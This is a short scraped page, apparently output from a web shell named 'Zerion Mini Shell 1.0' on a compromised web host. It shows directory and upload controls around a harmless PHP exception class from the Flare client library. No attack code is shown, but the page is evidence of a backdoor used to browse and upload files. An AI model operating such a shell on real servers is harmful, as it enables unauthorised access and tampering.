ok

Mini Shell

Direktori : /home2/selectio/www/innerstore/vendor/facade/flare-client-php/src/Http/Exceptions/
Upload File :
Current File : /home2/selectio/www/innerstore/vendor/facade/flare-client-php/src/Http/Exceptions/InvalidData.php

<?php

namespace Facade\FlareClient\Http\Exceptions;

use Facade\FlareClient\Http\Response;

class InvalidData extends BadResponseCode
{
    public static function getMessageForResponse(Response $response)
    {
        return 'Invalid data found';
    }
}

Zerion Mini Shell 1.0